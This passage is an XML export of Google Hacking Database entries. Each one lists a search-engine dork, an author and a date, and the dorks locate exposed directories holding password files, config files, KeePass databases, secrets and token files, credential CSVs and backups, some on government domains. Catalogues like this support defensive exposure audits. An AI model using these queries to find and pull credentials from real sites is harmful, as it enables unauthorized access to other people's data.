Bruno Schmid
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:&quot;paypal&quot; log</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:&quot;paypal&quot; log</querystring>
<edb></edb>
<date>2018-03-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5535</id>
<link>https://www.exploit-db.com/ghdb/5535</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:/*sql* filetype:log</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of&quot; inurl:/*sql* filetype:log
Date: 09/14/2019
Exploit Author: th3d3xt3r
Category: Files containing Juicy Info
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:/*sql* filetype:log</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:/*sql* filetype:log</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>The Dexter</author>
</entry>
<entry>
<id>8193</id>
<link>https://www.exploit-db.com/ghdb/8193</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: Midhya Mathew</textualDescription>
<query>intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>Midhya Mathew</author>
</entry>
<entry>
<id>8256</id>
<link>https://www.exploit-db.com/ghdb/8256</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; inurl:/backup/ &quot;wp-config&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; inurl:/backup/ &quot;wp-config&quot;
# Files Containing Juicy Info
# Date: 16/10/2023
# Exploit Author: William Bastos
</textualDescription>
<query>intitle:&quot;Index of&quot; inurl:/backup/ &quot;wp-config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; inurl:/backup/ &quot;wp-config&quot;</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>William Bastos</author>
</entry>
<entry>
<id>8324</id>
<link>https://www.exploit-db.com/ghdb/8324</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; inurl:/concrete5/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; inurl:/concrete5/
# Files Containing Juicy Info
# Date: 06/11/2023
# Exploit: Nayab Keshodwala</textualDescription>
<query>Concrete5 CMS files</query>
<querystring>https://www.google.com/search?q=Concrete5 CMS files</querystring>
<edb></edb>
<date>2023-11-06</date>
<author>Nayab Keshodwala</author>
</entry>
<entry>
<id>8344</id>
<link>https://www.exploit-db.com/ghdb/8344</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:/config/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:/config/
# Files Containing Juicy Info
# Date: 17/11/2023
# Exploit: Qais Qais</textualDescription>
<query>intitle:&quot;index of&quot; inurl:/config/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:/config/</querystring>
<edb></edb>
<date>2023-11-17</date>
<author>Qais Qais</author>
</entry>
<entry>
<id>8101</id>
<link>https://www.exploit-db.com/ghdb/8101</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:admin/login</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:admin/login
# Files Containing Juicy Info
# Date:07/03/2023
# Exploit Author: AJAY JOSEPH</textualDescription>
<query>intitle:&quot;index of&quot; inurl:admin/login</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:admin/login</querystring>
<edb></edb>
<date>2023-03-07</date>
<author>AJAY JOSEPH</author>
</entry>
<entry>
<id>8122</id>
<link>https://www.exploit-db.com/ghdb/8122</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:admin/php</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:admin/php
# Files Containing Juicy Info
# Date:21/03/2023
# Exploit Author: Md Hasib</textualDescription>
<query>intitle:&quot;index of&quot; inurl:admin/php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:admin/php</querystring>
<edb></edb>
<date>2023-03-21</date>
<author>Md Hasib</author>
</entry>
<entry>
<id>8363</id>
<link>https://www.exploit-db.com/ghdb/8363</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; inurl:apache2.conf</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; inurl:apache2.conf
# Files Containing Juicy Info
# Date: 30/11/2023
# Exploit: shar0548</textualDescription>
<query>Submission of New Google Dork</query>
<querystring>https://www.google.com/search?q=Submission of New Google Dork</querystring>
<edb></edb>
<date>2023-11-30</date>
<author>shar0548</author>
</entry>
<entry>
<id>7432</id>
<link>https://www.exploit-db.com/ghdb/7432</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; inurl:data/plugins/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; inurl:data/plugins/
# Files Containing Juicy Info
# Date:11/10/2021
# Exploit Author: Chirag Prajapati</textualDescription>
<query>intitle:&quot;Index of&quot; inurl:data/plugins/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; inurl:data/plugins/</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Chirag Prajapati</author>
</entry>
<entry>
<id>5623</id>
<link>https://www.exploit-db.com/ghdb/5623</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:ftp intext:logs</shortDescription>
<textualDescription># Google Dork : intitle:&quot;index of&quot; inurl:ftp intext:logs
# Category : File contains Juicy items
# Date : 05-11-2019
# Author : Dhaiwat Mehta
</textualDescription>
<query>intitle:&quot;index of&quot; inurl:ftp intext:logs</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:ftp intext:logs</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Dhaiwat Mehta</author>
</entry>
<entry>
<id>7370</id>
<link>https://www.exploit-db.com/ghdb/7370</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:gov Juicy Info |GHDB</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:gov Juicy Info |GHDB
# Files Containing Juicy Info
# Date:02/10/2021
# Exploit Author: Parul Gulati</textualDescription>
<query>intitle:&quot;index of&quot; inurl:gov Juicy Info |GHDB</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:gov Juicy Info |GHDB</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Parul Gulati</author>
</entry>
<entry>
<id>8032</id>
<link>https://www.exploit-db.com/ghdb/8032</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:SUID</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:SUID
# Files Containing Juicy Info
# Date:19/09/2022
# Exploit Author: Mahedi Hassan</textualDescription>
<query>intitle:&quot;index of&quot; inurl:SUID</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:SUID</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>Mahedi Hassan</author>
</entry>
<entry>
<id>8031</id>
<link>https://www.exploit-db.com/ghdb/8031</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:superadmin</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:superadmin
# Files Containing Juicy Info
# Date:19/09/2022
# Exploit Author: Mahedi Hassan</textualDescription>
<query>intitle:&quot;index of&quot; inurl:superadmin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:superadmin</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>Mahedi Hassan</author>
</entry>
<entry>
<id>8110</id>
<link>https://www.exploit-db.com/ghdb/8110</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:wp-json index.json</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; inurl:wp-json index.json
# Files Containing Juicy Info
# Date:14/03/2023
# Exploit Author: Rutvik Jaini</textualDescription>
<query>intitle:&quot;index of&quot; inurl:wp-json index.json</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; inurl:wp-json index.json</querystring>
<edb></edb>
<date>2023-03-14</date>
<author>Rutvik Jaini</author>
</entry>
<entry>
<id>6448</id>
<link>https://www.exploit-db.com/ghdb/6448</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; jboss-service.xml</shortDescription>
<textualDescription>Description : intitle:&quot;index of&quot; jboss-service.xml
The Google dork of intitle:&quot;intitle:&quot;index of&quot; jboss-service.xml gives
juicy information of JBoss Application Server
Author:- Anurag Kumar
</textualDescription>
<query>intitle:&quot;index of&quot; jboss-service.xml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; jboss-service.xml</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Anurag Kumar</author>
</entry>
<entry>
<id>5959</id>
<link>https://www.exploit-db.com/ghdb/5959</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; keepass.kdbx OR database.kdbx</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; keepass.kdbx OR database.kdbx
# KeePass database key file in open web directories.
# Date: 28/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; keepass.kdbx OR database.kdbx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; keepass.kdbx OR database.kdbx</querystring>
<edb></edb>
<date>2020-04-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5705</id>
<link>https://www.exploit-db.com/ghdb/5705</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; lesshsQ/ OR .lesshst/ -pool -pub</shortDescription>
<textualDescription>Less history file which can contain file names good to be used in social
engineering.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; lesshsQ/ OR .lesshst/ -pool -pub</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; lesshsQ/ OR .lesshst/ -pool -pub</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5967</id>
<link>https://www.exploit-db.com/ghdb/5967</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; license-key.txt</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; license-key.txt
Description: This Google dork lists out license keys leaked for various
software/services.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; license-key.txt</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; license-key.txt</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7858</id>
<link>https://www.exploit-db.com/ghdb/7858</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; linkedin-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; linkedin-api
# Files Containing Juicy Info
# Date:02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; linkedin-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; linkedin-api</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5962</id>
<link>https://www.exploit-db.com/ghdb/5962</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; machine.config</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; machine.config
Description: This Google dork lists out machine.config files for asp .net
websites
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; machine.config</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; machine.config</querystring>
<edb></edb>
<date>2020-04-29</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8292</id>
<link>https://www.exploit-db.com/ghdb/8292</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; mysql inurl:./db/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; mysql inurl:./db/
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit Rahul Thakur</textualDescription>
<query>Reporting a New Google Dork : intitle:&quot;index of&quot; mysql inurl:./db/</query>
<querystring>https://www.google.com/search?q=Reporting a New Google Dork : intitle:&quot;index of&quot; mysql inurl:./db/</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Rahul Thakur</author>
</entry>
<entry>
<id>227</id>
<link>https://www.exploit-db.com/ghdb/227</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; mysql.conf OR mysql_config</shortDescription>
<textualDescription>This file contains port number, version number and path info to MySQL server.</textualDescription>
<query>intitle:&quot;index of&quot; mysql.conf OR mysql_config</query>
<querystring>https://www.google.com/search?q=intitle%3A%22index+of%22+mysql.conf+OR+mysql_config</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>5028</id>
<link>https://www.exploit-db.com/ghdb/5028</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; pagefile.sys</shortDescription>
<textualDescription>This large (normally over 1GB) file is created by Windows Systems when
there is not enough RAM in the system. Since lots of the RAM is in the
file, chances are that a lot of good information will be in it.
This is a Windows dork, wont work in Linux or Mac.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>intitle:&quot;index of&quot; pagefile.sys</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; pagefile.sys</querystring>
<edb></edb>
<date>2018-11-14</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5298</id>
<link>https://www.exploit-db.com/ghdb/5298</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; pass.txt</shortDescription>
<textualDescription>dork:
intitle:&quot;Index of&quot; pass.txt
Author:Mayur parmar
Info:
it contains files that have pass.txt name
some juicy information
</textualDescription>
<query>intitle:&quot;Index of&quot; pass.txt</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; pass.txt</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>7866</id>
<link>https://www.exploit-db.com/ghdb/7866</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; people.1st</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of” people.1st
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;Index of&quot; people.1st</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; people.1st</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8341</id>
<link>https://www.exploit-db.com/ghdb/8341</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; private</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; private
# Files Containing Juicy Info
# Date: 10/11/2023
# Exploit: slacker pwns</textualDescription>
<query>intitle:&quot;index of&quot; private</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; private</querystring>
<edb></edb>
<date>2023-11-10</date>
<author>slacker pwns</author>
</entry>
<entry>
<id>6283</id>
<link>https://www.exploit-db.com/ghdb/6283</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; secrets.yml</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; secrets.yml
Date: 2020-06-15
by
krushna Lipane
</textualDescription>
<query>intitle:&quot;index of&quot; secrets.yml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; secrets.yml</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>krushna Lipane</author>
</entry>
<entry>
<id>7256</id>
<link>https://www.exploit-db.com/ghdb/7256</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; service.pwd</shortDescription>
<textualDescription>#Google Dork : intitle:&quot;Index of&quot; service.pwd
#Description: Files Containing Juicy Info
#Date: 02/08/2021
#Exploit Author : Tanvir Imon</textualDescription>
<query>intitle:&quot;Index of&quot; service.pwd</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; service.pwd</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Tanvir Imon</author>
</entry>
<entry>
<id>7749</id>
<link>https://www.exploit-db.com/ghdb/7749</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; Servlet&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; Servlet&quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; Servlet&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; Servlet&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5968</id>
<link>https://www.exploit-db.com/ghdb/5968</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; settings.xml</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; settings.xml
Description: This Google dork lists out sensitive settings.xml files for
apps/websites.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; settings.xml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; settings.xml</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8121</id>
<link>https://www.exploit-db.com/ghdb/8121</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; site:.bd</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; site:.bd
# Files Containing Juicy Info
# Date:21/03/2023
# Exploit Author: Soriful Islam</textualDescription>
<query>intitle:&quot;Index of&quot; site:.bd</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; site:.bd</querystring>
<edb></edb>
<date>2023-03-21</date>
<author>Soriful Islam</author>
</entry>
<entry>
<id>7774</id>
<link>https://www.exploit-db.com/ghdb/7774</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; site:gov.*</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; site:gov.*
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: reza abasi</textualDescription>
<query>intitle:&quot;index of&quot; site:gov.*</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; site:gov.*</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7771</id>
<link>https://www.exploit-db.com/ghdb/7771</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; site:gov.gr</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; site:gov.gr
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; site:gov.gr</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; site:gov.gr</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7800</id>
<link>https://www.exploit-db.com/ghdb/7800</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; site:gov.in</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; site:gov.in
# Files Containing Juicy Info
# Date:14/11/2021
# Exploit Author: Arindam Saha</textualDescription>
<query>intitle:&quot;index of&quot; site:gov.in</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; site:gov.in</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Arindam Saha</author>
</entry>
<entry>
<id>7764</id>
<link>https://www.exploit-db.com/ghdb/7764</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; site:gov.np</shortDescription>
<textualDescription># Google Dork: intitle:“index of” site:gov.np
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; site:gov.np</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; site:gov.np</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7770</id>
<link>https://www.exploit-db.com/ghdb/7770</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; site:gov.ru</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; site:gov.ru
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; site:gov.ru</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; site:gov.ru</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7857</id>
<link>https://www.exploit-db.com/ghdb/7857</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; sns-login</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; sns-login
# Files Containing Juicy Info
# Date:02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; sns-login</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; sns-login</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6052</id>
<link>https://www.exploit-db.com/ghdb/6052</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; test.logs</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; test.logs
# Juicy information and sensitive directories.
# Date: 6/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; test.logs</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; test.logs</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5709</id>
<link>https://www.exploit-db.com/ghdb/5709</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; ticket.conf</shortDescription>
<textualDescription>Email info sometimes database dumps... Good luck! :)
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; ticket.conf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; ticket.conf</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7855</id>
<link>https://www.exploit-db.com/ghdb/7855</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; twitter-api-php</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; twitter-api-php
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; twitter-api-php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; twitter-api-php</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5265</id>
<link>https://www.exploit-db.com/ghdb/5265</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; unattend.xml</shortDescription>
<textualDescription>Files containing juicy info and sometimes passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; unattend.xml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; unattend.xml</querystring>
<edb></edb>
<date>2019-06-20</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>617</id>
<link>https://www.exploit-db.com/ghdb/617</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; upload size parent directory</shortDescription>
<textualDescription>Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff.</textualDescription>
<query>intitle:&quot;Index of&quot; upload size parent directory</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Index+of%22+upload+size+parent+directory</querystring>
<edb></edb>
<date>2004-10-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7750</id>
<link>https://www.exploit-db.com/ghdb/7750</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; upload.asp &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; upload.asp &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; upload.asp &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; upload.asp &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6021</id>
<link>https://www.exploit-db.com/ghdb/6021</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; users.bak</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; users.bak
Description: This Google dork lists out sensitive user data backups stored
in a &quot;users.bak&quot; file for a web-server.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; users.bak</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; users.bak</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5105</id>
<link>https://www.exploit-db.com/ghdb/5105</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; users.csv | credentials.csv | accounts.csv</shortDescription>
<textualDescription>Good information, sometimes with passwords.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; users.csv | credentials.csv | accounts.csv</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; users.csv | credentials.csv | accounts.csv</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6887</id>
<link>https://www.exploit-db.com/ghdb/6887</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; ws_ftp.ini</shortDescription>
<textualDescription>Discription : The &quot;ws_ftp.ini&quot; file may contain usernames and passwords of
FTP users. It may also displays parent directory.
</textualDescription>
<query>intitle:&quot;Index of&quot; ws_ftp.ini</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; ws_ftp.ini</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Aman Srivastav</author>
</entry>
<entry>
<id>7861</id>
<link>https://www.exploit-db.com/ghdb/7861</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; zoom-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; zoom-api
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; zoom-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; zoom-api</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8342</id>
<link>https://www.exploit-db.com/ghdb/8342</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot;Eventlog Analyzer</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot;Eventlog Analyzer
# Files Containing Juicy Info
# Date: 17/11/2023
# Exploit: Connect2maviya</textualDescription>
<query>intitle:&quot;index of&quot;Eventlog Analyzer</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot;Eventlog Analyzer</querystring>
<edb></edb>
<date>2023-11-17</date>
<author>Connect2maviya</author>
</entry>
<entry>
<id>8026</id>
<link>https://www.exploit-db.com/ghdb/8026</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot;|&quot;access_token.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot;|&quot;access_token.json&quot;
# Files Containing Juicy Info
# Date:17/08/2022
# Exploit Author: Leonardo Venegas</textualDescription>
<query>intitle:&quot;index of&quot;|&quot;access_token.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot;|&quot;access_token.json&quot;</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Leonardo Venegas</author>
</entry>
<entry>
<id>5748</id>
<link>https://www.exploit-db.com/ghdb/5748</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of/&quot; &quot;db.sql&quot;</shortDescription>
<textualDescription>Find database SQL files.
Google Dork: intitle:&quot;index of/&quot; &quot;db.sql&quot;
intitle:&quot;index of/&quot; &quot;db.sql&quot;
By Ishan Saha
</textualDescription>
<query>intitle:&quot;index of/&quot; &quot;db.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of/&quot; &quot;db.sql&quot;</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>Ishan Saha</author>
</entry>
<entry>
<id>586</id>
<link>https://www.exploit-db.com/ghdb/586</link>
<category>Files Containing Juicy Info</category>
